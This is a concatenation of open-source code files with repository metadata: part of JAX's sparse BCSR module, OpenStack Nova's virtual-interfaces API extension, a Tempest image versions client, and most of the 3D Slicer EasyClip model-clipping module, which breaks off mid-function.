    return bcsr_fromdense(mat, nse=nse, index_dtype=index_dtype,
                          n_dense=n_dense, n_batch=n_batch)

  def todense(self):
    """Create a dense version of the array."""
    return bcsr_todense(self)

  @classmethod
  def from_scipy_sparse(cls, mat, *, index_dtype=None, n_dense=0, n_batch=0):
    """Create a BCSR array from a :mod:`scipy.sparse` array."""
    if n_dense != 0 or n_batch != 0:
      raise NotImplementedError("BCSR from_scipy_sparse with nonzero n_dense/n_batch.")
    if mat.ndim != 2:
      raise ValueError(f"BCSR from_scipy_sparse requires 2D array; {mat.ndim}D is given.")
    mat = mat.tocsr()
    data = jnp.asarray(mat.data)
    indices = jnp.asarray(mat.indices).astype(index_dtype or jnp.int32)
    indptr = jnp.asarray(mat.indptr).astype(index_dtype or jnp.int32)
    return cls((data, indices, indptr), shape=mat.shape)
#--------------------------------------------------------------------
# vmappable handlers
def _bcsr_to_elt(cont, _, val, axis):
if axis is None:
return val
if axis >= val.n_batch:
raise ValueError(f"Cannot map in_axis={axis} for BCSR array with n_batch="
f"{val.n_batch}. in_axes for batched BCSR operations must "
"correspond to a batched dimension.")
return BCSR((cont(val.data, axis),
cont(val.indices, axis),
cont(val.indptr, axis)),
shape=val.shape[:axis] + val.shape[axis + 1:])
def _bcsr_from_elt(cont, axis_size, elt, axis):
if axis > elt.n_batch:
raise ValueError(f"BCSR: cannot add out_axis={axis} for BCSR array with "
f"n_batch={elt.n_batch}. BCSR batch axes must be a "
"contiguous block of leading dimensions.")
return BCSR((cont(axis_size, elt.data, axis),
cont(axis_size, elt.indices, axis),
cont(axis_size, elt.indptr, axis)),
shape=elt.shape[:axis] + (axis_size,) + elt.shape[axis:])
# Register BCSR as a vmappable container so jax.vmap can map over its batch
# axes (axis specs are plain ints).
batching.register_vmappable(BCSR, int, int, _bcsr_to_elt, _bcsr_from_elt, None)
| {
"content_hash": "727e00dcdbf6b5f0c7353e5fe1631e5a",
"timestamp": "",
"source": "github",
"line_count": 406,
"max_line_length": 111,
"avg_line_length": 37.39408866995074,
"alnum_prop": 0.6352259254380187,
"repo_name": "google/jax",
"id": "cde8024d2cc577a927ea81c1cbd002e5a05dd0ec",
"size": "15764",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "jax/experimental/sparse/bcsr.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "25710"
},
{
"name": "C++",
"bytes": "233622"
},
{
"name": "Dockerfile",
"bytes": "1514"
},
{
"name": "Jupyter Notebook",
"bytes": "98807"
},
{
"name": "Python",
"bytes": "7395044"
},
{
"name": "Shell",
"bytes": "17273"
},
{
"name": "Starlark",
"bytes": "88279"
}
],
"symlink_target": ""
} |
"""The virtual interfaces extension."""
import webob
from nova.api.openstack import api_version_request
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova.i18n import _
from nova import network
from nova.policies import virtual_interfaces as vif_policies
# Extension alias; used as the resource name under /servers/{id}/ below.
ALIAS = 'os-virtual-interfaces'
def _translate_vif_summary_view(req, vif):
    """Map a VIF object onto the keys used by the summary view."""
    view = {
        'id': vif.uuid,
        'mac_address': vif.address,
    }
    if api_version_request.is_supported(req, min_version='2.12'):
        view['net_id'] = vif.net_uuid
    # NOTE(gmann): This is for v2.1 compatible mode where response should be
    # same as v2 one.
    if req.is_legacy_v2():
        view['OS-EXT-VIF-NET:net_id'] = vif.net_uuid
    return view
class ServerVirtualInterfaceController(wsgi.Controller):
    """The instance VIF API controller for the OpenStack API.

    This API is deprecated from the Microversion '2.44'.
    """

    def __init__(self):
        self.compute_api = compute.API()
        self.network_api = network.API()
        super(ServerVirtualInterfaceController, self).__init__()

    def _items(self, req, server_id, entity_maker):
        """Return the instance's VIFs, each transformed by ``entity_maker``."""
        context = req.environ['nova.context']
        context.can(vif_policies.BASE_POLICY_NAME)
        instance = common.get_instance(self.compute_api, context, server_id)
        try:
            vifs = self.network_api.get_vifs_by_instance(context, instance)
        except NotImplementedError:
            msg = _('Listing virtual interfaces is not supported by this '
                    'cloud.')
            raise webob.exc.HTTPBadRequest(explanation=msg)
        entities = [entity_maker(req, vif)
                    for vif in common.limited(vifs, req)]
        return {'virtual_interfaces': entities}

    @wsgi.Controller.api_version("2.1", "2.43")
    @extensions.expected_errors((400, 404))
    def index(self, req, server_id):
        """Returns the list of VIFs for a given instance."""
        return self._items(req, server_id,
                           entity_maker=_translate_vif_summary_view)
class VirtualInterfaces(extensions.V21APIExtensionBase):
    """Virtual interface support."""

    name = "VirtualInterfaces"
    alias = ALIAS
    version = 1

    def get_resources(self):
        """Expose the VIF list as a sub-resource of servers."""
        resource = extensions.ResourceExtension(
            ALIAS,
            controller=ServerVirtualInterfaceController(),
            parent=dict(member_name='server', collection_name='servers'))
        return [resource]

    def get_controller_extensions(self):
        """This plugin adds no controller extensions."""
        return []
| {
"content_hash": "54c508e29d833556525d1ce19962f934",
"timestamp": "",
"source": "github",
"line_count": 86,
"max_line_length": 76,
"avg_line_length": 32.26744186046512,
"alnum_prop": 0.6497297297297298,
"repo_name": "rajalokan/nova",
"id": "6b59e9472246a56380e936b7898bcbc7a71ab13e",
"size": "3406",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nova/api/openstack/compute/virtual_interfaces.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "601"
},
{
"name": "PHP",
"bytes": "4503"
},
{
"name": "Python",
"bytes": "19100322"
},
{
"name": "Shell",
"bytes": "26793"
},
{
"name": "Smarty",
"bytes": "299237"
}
],
"symlink_target": ""
} |
from oslo_serialization import jsonutils as json
from tempest.lib.common import rest_client
class VersionsClient(rest_client.RestClient):
    """Client for the image-service version discovery endpoint."""

    api_version = "v2"

    def list_versions(self):
        """List API versions"""
        base_url = self._get_base_version_url()
        resp, body = self.raw_request(base_url, 'GET')
        self._error_checker(resp, body)
        # The version index answers 300 (Multiple Choices), not 200.
        self.expected_success(300, resp.status)
        return rest_client.ResponseBody(resp, json.loads(body))

    def has_version(self, version):
        """Return True if a version is supported."""
        wanted = 'v%s' % version
        for entry in self.list_versions()['versions']:
            if entry['id'] == wanted:
                return entry['status'] in ('SUPPORTED', 'CURRENT')
        return False
| {
"content_hash": "75a5d416fe6be650b3ce21e0509e7203",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 60,
"avg_line_length": 32.142857142857146,
"alnum_prop": 0.6255555555555555,
"repo_name": "openstack/tempest",
"id": "98b4fb6209806dba6bc60313c17c18a9da7dc15d",
"size": "1531",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tempest/lib/services/image/v2/versions_client.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5364077"
},
{
"name": "Shell",
"bytes": "8684"
}
],
"symlink_target": ""
} |
from __main__ import vtk, qt, ctk, slicer
from slicer.ScriptedLoadableModule import *
import os
import numpy
import pickle
import json
#
# Load Files
#
class EasyClip(ScriptedLoadableModule):
    """Module descriptor: registers Easy Clip in Slicer's module list."""

    def __init__(self, parent):
        ScriptedLoadableModule.__init__(self, parent)
        parent.title = "Easy Clip"
        parent.categories = ["Surface Models"]
        parent.dependencies = []
        parent.contributors = ["Julia Lopinto, (University Of Michigan)", "Jean-Baptiste Vimort, (University Of Michigan)"]
        parent.helpText = """
This Module is used to clip one or different 3D Models according to a predetermined plane.
Plane can be saved to be reused for other models.
After clipping, the models are closed and can be saved as new 3D Models.
This is an alpha version of the module.
It can't be used for the moment.
"""
        parent.acknowledgementText = """
This work was supported by the National
Institutes of Dental and Craniofacial Research
and Biomedical Imaging and Bioengineering of
the National Institutes of Health under Award
Number R01DE024450.
"""
        self.parent = parent
class EasyClipWidget(ScriptedLoadableModuleWidget):
    """GUI widget for Easy Clip.

    Loads the Qt .ui panel, wires the Red/Yellow/Green plane checkboxes and
    radio buttons to EasyClipLogic, and drives clipping/undo plus the
    colored background volumes that tint the slice planes in 3D.
    """

    def setup(self):
        """Build the module panel and connect all signals."""
        ScriptedLoadableModuleWidget.setup(self)
        print("-------Easy Clip Widget Setup---------")
        # GLOBALS:
        self.logic = EasyClipLogic(self)
        # Names of the helper background volumes; these must never be clipped.
        self.ignoredNodeNames = ('Red Volume Slice', 'Yellow Volume Slice', 'Green Volume Slice')
        self.colorSliceVolumes = dict()
        # State saved by the last clip, used by Undo.
        self.dictionnaryModel = dict()
        self.hardenModelIDdict = dict()
        self.landmarkDescriptionDict = dict()
        self.planeControlsDictionary = {}
        # Instantiate and connect widgets
        #
        # Interface
        #
        # Load the Qt Designer .ui file describing this module's panel.
        loader = qt.QUiLoader()
        moduleName = 'EasyClip'
        scriptedModulesPath = eval('slicer.modules.%s.path' % moduleName.lower())
        scriptedModulesPath = os.path.dirname(scriptedModulesPath)
        path = os.path.join(scriptedModulesPath, 'Resources', 'UI', '%s.ui' % moduleName)
        qfile = qt.QFile(path)
        qfile.open(qt.QFile.ReadOnly)
        widget = loader.load(qfile, self.parent)
        self.layout = self.parent.layout()
        self.widget = widget
        self.layout.addWidget(widget)

        ##--------------------------- Scene --------------------------#
        # This attribute is useful for the Longitudinal Quantification extension.
        self.SceneCollapsibleButton = self.logic.get("SceneCollapsibleButton")
        treeView = self.logic.get("treeView")
        treeView.setMRMLScene(slicer.app.mrmlScene())
        treeView.sceneModel().setHorizontalHeaderLabels(["Models"])
        treeView.sortFilterProxyModel().nodeTypes = ['vtkMRMLModelNode']
        treeView.header().setVisible(False)
        self.autoChangeLayout = self.logic.get("autoChangeLayout")
        self.computeBox = self.logic.get("computeBox")
        self.computeBox.connect('clicked()', self.onComputeBox)

        #--------------------------- Clipping Part --------------------------#
        # CLIPPING BUTTONS
        # For each slice color: a checkbox enables the plane, two radio
        # buttons choose which half-space to keep (negative/positive side).
        self.red_plane_box = self.logic.get("red_plane_box")
        self.radio_red_Neg = self.logic.get("radio_red_Neg")
        self.radio_red_Neg.setIcon(qt.QIcon(":/Icons/RedSpaceNegative.png"))
        self.radio_red_Pos = self.logic.get("radio_red_Pos")
        self.radio_red_Pos.setIcon(qt.QIcon(":/Icons/RedSpacePositive.png"))
        self.red_plane_box.connect('clicked(bool)', lambda: self.logic.onCheckBoxClicked('Red',
                                                                                         self.red_plane_box,
                                                                                         self.radio_red_Neg))
        self.red_plane_box.connect('clicked(bool)', lambda: self.updateSliceState("vtkMRMLSliceNodeRed",
                                                                                  self.red_plane_box.isChecked(),
                                                                                  self.radio_red_Neg.isChecked(),
                                                                                  self.radio_red_Pos.isChecked()))
        self.radio_red_Neg.connect('clicked(bool)', lambda: self.updateSliceState("vtkMRMLSliceNodeRed",
                                                                                  self.red_plane_box.isChecked(),
                                                                                  self.radio_red_Neg.isChecked(),
                                                                                  self.radio_red_Pos.isChecked()))
        self.radio_red_Pos.connect('clicked(bool)', lambda: self.updateSliceState("vtkMRMLSliceNodeRed",
                                                                                  self.red_plane_box.isChecked(),
                                                                                  self.radio_red_Neg.isChecked(),
                                                                                  self.radio_red_Pos.isChecked()))

        self.yellow_plane_box = self.logic.get("yellow_plane_box")
        self.radio_yellow_Neg = self.logic.get("radio_yellow_Neg")
        self.radio_yellow_Neg.setIcon(qt.QIcon(":/Icons/YellowSpaceNegative.png"))
        self.radio_yellow_Pos = self.logic.get("radio_yellow_Pos")
        self.radio_yellow_Pos.setIcon(qt.QIcon(":/Icons/YellowSpacePositive.png"))
        self.yellow_plane_box.connect('clicked(bool)', lambda: self.logic.onCheckBoxClicked('Yellow',
                                                                                            self.yellow_plane_box,
                                                                                            self.radio_yellow_Neg))
        self.yellow_plane_box.connect('clicked(bool)', lambda: self.updateSliceState("vtkMRMLSliceNodeYellow",
                                                                                     self.yellow_plane_box.isChecked(),
                                                                                     self.radio_yellow_Neg.isChecked(),
                                                                                     self.radio_yellow_Pos.isChecked()))
        self.radio_yellow_Neg.connect('clicked(bool)', lambda: self.updateSliceState("vtkMRMLSliceNodeYellow",
                                                                                     self.yellow_plane_box.isChecked(),
                                                                                     self.radio_yellow_Neg.isChecked(),
                                                                                     self.radio_yellow_Pos.isChecked()))
        self.radio_yellow_Pos.connect('clicked(bool)', lambda: self.updateSliceState("vtkMRMLSliceNodeYellow",
                                                                                     self.yellow_plane_box.isChecked(),
                                                                                     self.radio_yellow_Neg.isChecked(),
                                                                                     self.radio_yellow_Pos.isChecked()))

        self.green_plane_box = self.logic.get("green_plane_box")
        self.radio_green_Neg = self.logic.get("radio_green_Neg")
        self.radio_green_Neg.setIcon(qt.QIcon(":/Icons/GreenSpaceNegative.png"))
        self.radio_green_Pos = self.logic.get("radio_green_Pos")
        self.radio_green_Pos.setIcon(qt.QIcon(":/Icons/GreenSpacePositive.png"))
        self.green_plane_box.connect('clicked(bool)', lambda: self.logic.onCheckBoxClicked('Green',
                                                                                           self.green_plane_box,
                                                                                           self.radio_green_Neg))
        self.green_plane_box.connect('clicked(bool)', lambda: self.updateSliceState("vtkMRMLSliceNodeGreen",
                                                                                    self.green_plane_box.isChecked(),
                                                                                    self.radio_green_Neg.isChecked(),
                                                                                    self.radio_green_Pos.isChecked()))
        self.radio_green_Neg.connect('clicked(bool)', lambda: self.updateSliceState("vtkMRMLSliceNodeGreen",
                                                                                    self.green_plane_box.isChecked(),
                                                                                    self.radio_green_Neg.isChecked(),
                                                                                    self.radio_green_Pos.isChecked()))
        self.radio_green_Pos.connect('clicked(bool)', lambda: self.updateSliceState("vtkMRMLSliceNodeGreen",
                                                                                    self.green_plane_box.isChecked(),
                                                                                    self.radio_green_Neg.isChecked(),
                                                                                    self.radio_green_Pos.isChecked()))

        self.ClippingButton = self.logic.get("ClippingButton")
        self.ClippingButton.connect('clicked()', self.ClippingButtonClicked)
        self.UndoButton = self.logic.get("UndoButton")
        self.UndoButton.connect('clicked()', self.UndoButtonClicked)

        # -------------------------------- PLANES --------------------------------#
        self.CollapsibleButton3 = self.logic.get("CollapsibleButton3")
        self.save = self.logic.get("save")
        self.read = self.logic.get("read")
        self.save.connect('clicked(bool)', self.savePlane)
        self.read.connect('clicked(bool)', self.readPlane)

        #-------------------- onCloseScene ----------------------#
        slicer.mrmlScene.AddObserver(slicer.mrmlScene.EndCloseEvent, self.onCloseScene)

    def onCloseScene(self, obj, event):
        """Reset cached plane/volume state when the MRML scene is closed."""
        self.colorSliceVolumes = dict()
        for key in self.logic.ColorNodeCorrespondence:
            self.logic.planeDict[self.logic.ColorNodeCorrespondence[key]] = self.logic.planeDef()
        self.UndoButton.enabled = False

    def enter(self):
        """Called when the module becomes active: restore layout and planes."""
        if self.autoChangeLayout.isChecked():
            lm = slicer.app.layoutManager()
            self.currentLayout = lm.layout
            lm.setLayout(4)  # 3D-View
        # Show manual planes
        for planeControls in self.planeControlsDictionary.values():
            if planeControls.PlaneIsDefined():
                planeControls.logic.planeLandmarks(planeControls.landmark1ComboBox.currentIndex, planeControls.landmark2ComboBox.currentIndex,
                                                   planeControls.landmark3ComboBox.currentIndex, planeControls.slider.value, planeControls.slideOpacity.value)
        # Checking the names of the fiducials
        list = slicer.mrmlScene.GetNodesByClass("vtkMRMLMarkupsFiducialNode")
        end = list.GetNumberOfItems()
        for i in range(0, end):
            fidList = list.GetItemAsObject(i)
            landmarkDescription = self.logic.decodeJSON(fidList.GetAttribute("landmarkDescription"))
            if landmarkDescription:
                # Sync the stored labels with the current markup labels.
                for n in range(fidList.GetNumberOfMarkups()):
                    markupID = fidList.GetNthMarkupID(n)
                    markupLabel = fidList.GetNthMarkupLabel(n)
                    landmarkDescription[markupID]["landmarkLabel"] = markupLabel
                fidList.SetAttribute("landmarkDescription", self.logic.encodeJSON(landmarkDescription))
        self.onComputeBox()
        self.logic.onCheckBoxClicked('Red', self.red_plane_box, self.radio_red_Neg)
        self.logic.onCheckBoxClicked('Green', self.green_plane_box, self.radio_green_Neg)
        self.logic.onCheckBoxClicked('Yellow', self.yellow_plane_box, self.radio_yellow_Neg)

    def exit(self):
        """Called when leaving the module: hide planes and restore layout."""
        # Remove hidden nodes that are created just for Angle Planes
        # NOTE(review): the node is used after RemoveNode here — looks
        # suspicious but is kept as-is; confirm against Slicer's node lifetime.
        for x in self.colorSliceVolumes.values():
            node = slicer.mrmlScene.GetNodeByID(x)
            slicer.mrmlScene.RemoveNode(node)
            node.SetHideFromEditors(False)
        self.colorSliceVolumes = dict()
        # Hide manual planes
        for planeControls in self.planeControlsDictionary.values():
            if planeControls.PlaneIsDefined():
                planeControls.logic.planeLandmarks(planeControls.landmark1ComboBox.currentIndex, planeControls.landmark2ComboBox.currentIndex,
                                                   planeControls.landmark3ComboBox.currentIndex, planeControls.slider.value, 0)
        # Hide planes
        for x in self.logic.ColorNodeCorrespondence.keys():
            compNode = slicer.util.getNode('vtkMRMLSliceCompositeNode' + x)
            compNode.SetLinkedControl(False)
            slice = slicer.mrmlScene.GetNodeByID(self.logic.ColorNodeCorrespondence[x])
            slice.SetWidgetVisible(False)
            slice.SetSliceVisible(False)
        # Reset layout
        if self.autoChangeLayout.isChecked():
            lm = slicer.app.layoutManager()
            if lm.layout == 4:  # the user has not manually changed the layout
                lm.setLayout(self.currentLayout)

    def savePlane(self):
        """Persist the current plane matrices to a file chosen by the user."""
        self.logic.getCoord()
        self.logic.saveFunction()

    def readPlane(self):
        """Restore plane matrices from a previously saved file."""
        # Load plane matrix/function
        self.logic.readPlaneFunction()

    def UndoButtonClicked(self):
        """Restore the pre-clip polydata and fiducial attributes."""
        print("undo:")
        print(self.dictionnaryModel)
        self.UndoButton.enabled = False
        for key, value in self.dictionnaryModel.items():
            model = slicer.mrmlScene.GetNodeByID(key)
            model.SetAndObservePolyData(value)
        # NOTE(review): the dicts below are populated by ClippingButtonClicked;
        # Undo before any clip would hit empty dicts (no-op).
        for key, value in self.hardenModelIDdict.items():
            fidList = slicer.mrmlScene.GetNodeByID(key)
            fidList.SetAttribute("hardenModelID", value)
        for key, value in self.modelIDdict.items():
            fidList = slicer.mrmlScene.GetNodeByID(key)
            fidList.SetAttribute("connectedModelID", value)
        for key, value in self.landmarkDescriptionDict.items():
            fidList = slicer.mrmlScene.GetNodeByID(key)
            fidList.SetAttribute("landmarkDescription", value)

    def onComputeBox(self):
        """Fit colored background volumes around all visible models so the
        slice planes are visible in the 3D view."""
        #--------------------------- Box around the model --------------------------#
        positionOfVisibleNodes = self.getPositionOfModelNodes(True)
        if len(positionOfVisibleNodes) == 0:
            return
        # ``sys`` may live on the slicer module or on the logic class.
        try:
            maxValue = slicer.sys.float_info.max
        except:
            maxValue = self.logic.sys.float_info.max
        # bound = [xmin, xmax, ymin, ymax, zmin, zmax], widened per model.
        bound = [maxValue, -maxValue, maxValue, -maxValue, maxValue, -maxValue]
        for i in positionOfVisibleNodes:
            node = slicer.mrmlScene.GetNthNodeByClass(i, "vtkMRMLModelNode")
            model = self.logic.createIntermediateHardenModel(node)
            polydata = model.GetPolyData()
            if polydata is None or not hasattr(polydata, "GetBounds"):
                continue
            tempbound = polydata.GetBounds()
            bound[0] = min(bound[0], tempbound[0])
            bound[2] = min(bound[2], tempbound[2])
            bound[4] = min(bound[4], tempbound[4])
            bound[1] = max(bound[1], tempbound[1])
            bound[3] = max(bound[3], tempbound[3])
            bound[5] = max(bound[5], tempbound[5])
        # --------------------------- Box around the model --------------------------#
        # Per axis: extent (padded 10%) and center of the bounding box.
        dim = []
        origin = []
        for x in range(0, 3):
            dim.append(bound[x * 2 + 1] - bound[x * 2])
            origin.append(bound[x * 2] + dim[x] / 2)
            dim[x] *= 1.1
        # Label values chosen for distinct colors in GenericAnatomyColors.
        dictColors = {'Red': 32, 'Yellow': 15, 'Green': 1}
        for x in dictColors.keys():
            sampleVolumeNode = self.CreateNewNode(x, dictColors[x], dim, origin)
            compNode = slicer.util.getNode('vtkMRMLSliceCompositeNode' + x)
            compNode.SetLinkedControl(False)
            compNode.SetBackgroundVolumeID(sampleVolumeNode.GetID())
        lm = slicer.app.layoutManager()
        #Reset and fit 2D-views
        lm.resetSliceViews()
        for x in dictColors.keys():
            logic = lm.sliceWidget(x)
            node = logic.mrmlSliceNode()
            node.SetSliceResolutionMode(node.SliceResolutionMatch2DView)
            logic.fitSliceToBackground()
        #Reset pink box around models
        for i in range(0, lm.threeDViewCount):
            threeDView = lm.threeDWidget(i).threeDView()
            threeDView.resetFocalPoint()
            #Reset camera in 3D view to center the models and position the camera so that all actors can be seen
            threeDView.renderWindow().GetRenderers().GetFirstRenderer().ResetCamera()

    def getPositionOfModelNodes(self, onlyVisible):
        """Return scene indices of model nodes, skipping the module's own
        helper volumes and (optionally) hidden models."""
        numNodes = slicer.mrmlScene.GetNumberOfNodesByClass("vtkMRMLModelNode")
        positionOfNodes = list()
        for i in range(0, numNodes):
            node = slicer.mrmlScene.GetNthNodeByClass(i, "vtkMRMLModelNode")
            if node.GetName() in self.ignoredNodeNames:
                continue
            if onlyVisible is True and node.GetDisplayVisibility() == 0:
                continue
            positionOfNodes.append(i)
        return positionOfNodes

    def CreateNewNode(self, colorName, color, dim, origin):
        """Create (once) and position a 1-voxel labelmap volume used only to
        color the matching slice plane."""
        # we add a pseudo-random number to the name of our empty volume to avoid the risk of having a volume called
        # exactly the same by the user which could be confusing. We could also have used slicer.app.sessionId()
        if colorName not in self.colorSliceVolumes.keys():
            VolumeName = "EasyClip_EmptyVolume_" + str(slicer.app.applicationPid()) + "_" + colorName
            # Do NOT set the spacing and the origin of imageData (vtkImageData)
            # The spacing and the origin should only be set in the vtkMRMLScalarVolumeNode!!!!!!
            # We only create an image of 1 voxel (as we only use it to color the planes
            imageData = vtk.vtkImageData()
            imageData.SetDimensions(1, 1, 1)
            imageData.AllocateScalars(vtk.VTK_UNSIGNED_CHAR, 1)
            imageData.SetScalarComponentFromDouble(0, 0, 0, 0, color)
            # Older Slicer versions have no dedicated labelmap node class.
            if hasattr(slicer, 'vtkMRMLLabelMapVolumeNode'):
                sampleVolumeNode = slicer.vtkMRMLLabelMapVolumeNode()
            else:
                sampleVolumeNode = slicer.vtkMRMLScalarVolumeNode()
            sampleVolumeNode = slicer.mrmlScene.AddNode(sampleVolumeNode)
            sampleVolumeNode.SetName(VolumeName)
            labelmapVolumeDisplayNode = slicer.vtkMRMLLabelMapVolumeDisplayNode()
            slicer.mrmlScene.AddNode(labelmapVolumeDisplayNode)
            colorNode = slicer.util.getNode('GenericAnatomyColors')
            labelmapVolumeDisplayNode.SetAndObserveColorNodeID(colorNode.GetID())
            sampleVolumeNode.SetAndObserveImageData(imageData)
            sampleVolumeNode.SetAndObserveDisplayNodeID(labelmapVolumeDisplayNode.GetID())
            labelmapVolumeDisplayNode.VisibilityOff()
            self.colorSliceVolumes[colorName] = sampleVolumeNode.GetID()
        sampleVolumeNode = slicer.mrmlScene.GetNodeByID(self.colorSliceVolumes[colorName])
        sampleVolumeNode.HideFromEditorsOn()
        # Stretch the single voxel to cover the models' bounding box.
        sampleVolumeNode.SetOrigin(origin[0], origin[1], origin[2])
        sampleVolumeNode.SetSpacing(dim[0], dim[1], dim[2])
        if not hasattr(slicer, 'vtkMRMLLabelMapVolumeNode'):
            sampleVolumeNode.SetLabelMap(1)
        sampleVolumeNode.SetHideFromEditors(True)
        sampleVolumeNode.SetSaveWithScene(False)
        return sampleVolumeNode

    def ClippingButtonClicked(self):
        """Run the clip and remember the pre-clip state for Undo."""
        self.logic.getCoord()
        self.dictionnaryModel, self.modelIDdict, self.hardenModelIDdict, self.landmarkDescriptionDict\
            = self.logic.clipping()
        self.UndoButton.enabled = True

    def updateSliceState(self, plane, boxState, negState, posState):
        """Mirror the GUI checkbox/radio state into the logic's planeDict."""
        print("Update Slice State")
        self.logic.planeDict[plane].boxState = boxState
        self.logic.planeDict[plane].negState = negState
        self.logic.planeDict[plane].posState = posState
class EasyClipLogic(ScriptedLoadableModuleLogic):
try:
slicer.sys
except:
import sys
class planeDef(object):
def __init__(self):
# Matrix that define each plane
self.matrix = None
# normal to the plane
self.n = None
# point in the plane
self.P = None
# Slice State
self.boxState = False
self.negState = False
self.posState = False
# Plane for cliping
self.vtkPlane = vtk.vtkPlane()
def __init__(self, interface):
self.interface = interface
self.ColorNodeCorrespondence = {'Red': 'vtkMRMLSliceNodeRed',
'Yellow': 'vtkMRMLSliceNodeYellow',
'Green': 'vtkMRMLSliceNodeGreen'}
self.get_normal = numpy.matrix([[0], [0], [1], [0]])
self.get_point = numpy.matrix([[0], [0], [0], [1]])
self.planeDict = dict()
for key in self.ColorNodeCorrespondence:
self.planeDict[self.ColorNodeCorrespondence[key]] = self.planeDef()
def get(self, objectName):
return self.findWidget(self.interface.widget, objectName)
def findWidget(self, widget, objectName):
if widget.objectName == objectName:
return widget
else:
for w in widget.children():
resulting_widget = self.findWidget(w, objectName)
if resulting_widget:
return resulting_widget
return None
def createIntermediateHardenModel(self, model):
hardenModel = slicer.mrmlScene.GetNodesByName("SurfaceRegistration_" + model.GetName() + "_hardenCopy_" + str(
slicer.app.applicationPid())).GetItemAsObject(0)
if hardenModel is None:
hardenModel = slicer.vtkMRMLModelNode()
hardenPolyData = vtk.vtkPolyData()
hardenPolyData.DeepCopy(model.GetPolyData())
hardenModel.SetAndObservePolyData(hardenPolyData)
hardenModel.SetName(
"SurfaceRegistration_" + model.GetName() + "_hardenCopy_" + str(slicer.app.applicationPid()))
if model.GetParentTransformNode():
hardenModel.SetAndObserveTransformNodeID(model.GetParentTransformNode().GetID())
hardenModel.HideFromEditorsOn()
slicer.mrmlScene.AddNode(hardenModel)
logic = slicer.vtkSlicerTransformLogic()
logic.hardenTransform(hardenModel)
return hardenModel
def onCheckBoxClicked(self, colorPlane, checkBox, radioButton ):
slice = slicer.util.getNode(self.ColorNodeCorrespondence[colorPlane])
print("Slice test", slice)
if checkBox.isChecked():
slice.SetWidgetVisible(True)
radioButton.setChecked(True)
else:
slice.SetWidgetVisible(False)
def getMatrix(self, slice):
mat = slice.GetSliceToRAS()
m = numpy.matrix([[mat.GetElement(0, 0), mat.GetElement(0, 1), mat.GetElement(0, 2), mat.GetElement(0, 3)],
[mat.GetElement(1, 0), mat.GetElement(1, 1), mat.GetElement(1, 2), mat.GetElement(1, 3)],
[mat.GetElement(2, 0), mat.GetElement(2, 1), mat.GetElement(2, 2), mat.GetElement(2, 3)],
[mat.GetElement(3, 0), mat.GetElement(3, 1), mat.GetElement(3, 2), mat.GetElement(3, 3)]])
return m
def getCoord(self):
for key, planeDef in self.planeDict.items():
planeDef.matrix = self.getMatrix(slicer.util.getNode(key))
planeDef.n = planeDef.matrix * self.get_normal
# print "n : \n", planeDef.n
planeDef.P = planeDef.matrix * self.get_point
# print "P : \n", planeDef.P
a = planeDef.n[0]
b = planeDef.n[1]
c = planeDef.n[2]
d = planeDef.n[0]*planeDef.P[0] + planeDef.n[1]*planeDef.P[1] + planeDef.n[2]*planeDef.P[2]
# print key + "plan equation : \n", a ,"* x + ", b , "* y + ", c , "* z - ", d ," = 0 "
def clipping(self):
planeCollection = vtk.vtkPlaneCollection()
harden = slicer.vtkSlicerTransformLogic()
tempTransform = slicer.vtkMRMLLinearTransformNode()
tempTransform.HideFromEditorsOn()
slicer.mrmlScene.AddNode(tempTransform)
numNodes = slicer.mrmlScene.GetNumberOfNodesByClass("vtkMRMLModelNode")
dictionnaryModel = dict()
hardenModelIDdict = dict()
landmarkDescriptionDict = dict()
modelIDdict = dict()
for i in range(3, numNodes):
planeCollection.RemoveAllItems()
mh = slicer.mrmlScene.GetNthNodeByClass(i, "vtkMRMLModelNode")
if mh.GetDisplayVisibility() == 0:
continue
model = slicer.util.getNode(mh.GetName())
transform = model.GetParentTransformNode()
if transform:
tempTransform.Copy(transform)
harden.hardenTransform(tempTransform)
m = vtk.vtkMatrix4x4()
tempTransform.GetMatrixTransformToParent(m)
m.Invert(m, m)
else:
m = vtk.vtkMatrix4x4()
for key, planeDef in self.planeDict.items():
hardenP = m.MultiplyPoint(planeDef.P)
hardenN = m.MultiplyPoint(planeDef.n)
if planeDef.boxState:
planeDef.vtkPlane.SetOrigin(hardenP[0], hardenP[1], hardenP[2])
if planeDef.negState:
planeDef.vtkPlane.SetNormal(-hardenN[0], -hardenN[1], -hardenN[2])
if planeDef.posState:
planeDef.vtkPlane.SetNormal(hardenN[0], hardenN[1], hardenN[2])
planeCollection.AddItem(planeDef.vtkPlane)
dictionnaryModel[model.GetID()]= model.GetPolyData()
polyData = model.GetPolyData()
clipper = vtk.vtkClipClosedSurface()
clipper.SetClippingPlanes(planeCollection)
clipper.SetInputData(polyData)
clipper.SetGenerateFaces(1)
clipper.SetScalarModeToLabels()
clipper.Update()
polyDataNew = clipper.GetOutput()
model.SetAndObservePolyData(polyDataNew)
# Checking if one ore more fiducial list are connected to this model
list = slicer.mrmlScene.GetNodesByClass("vtkMRMLMarkupsFiducialNode")
end = list.GetNumberOfItems()
for i in range(0,end):
fidList = list.GetItemAsObject(i)
if fidList.GetAttribute("connectedModelID"):
if fidList.GetAttribute("connectedModelID") == model.GetID():
modelIDdict[fidList.GetID()], hardenModelIDdict[fidList.GetID()], landmarkDescriptionDict[fidList.GetID()] = \
self.unprojectLandmarks(fidList)
return dictionnaryModel, modelIDdict, hardenModelIDdict, landmarkDescriptionDict
def unprojectLandmarks(self, fidList):
hardenModelID = fidList.GetAttribute("hardenModelID")
ModelID = fidList.GetAttribute("connectedModelID")
landmarkDescriptioncopy = fidList.GetAttribute("landmarkDescription")
fidList.SetAttribute("connectedModelID", None)
fidList.SetAttribute("hardenModelID", None)
landmarkDescription = self.decodeJSON(fidList.GetAttribute("landmarkDescription"))
for n in range(fidList.GetNumberOfMarkups()):
markupID = fidList.GetNthMarkupID(n)
landmarkDescription[markupID]["projection"]["isProjected"] = False
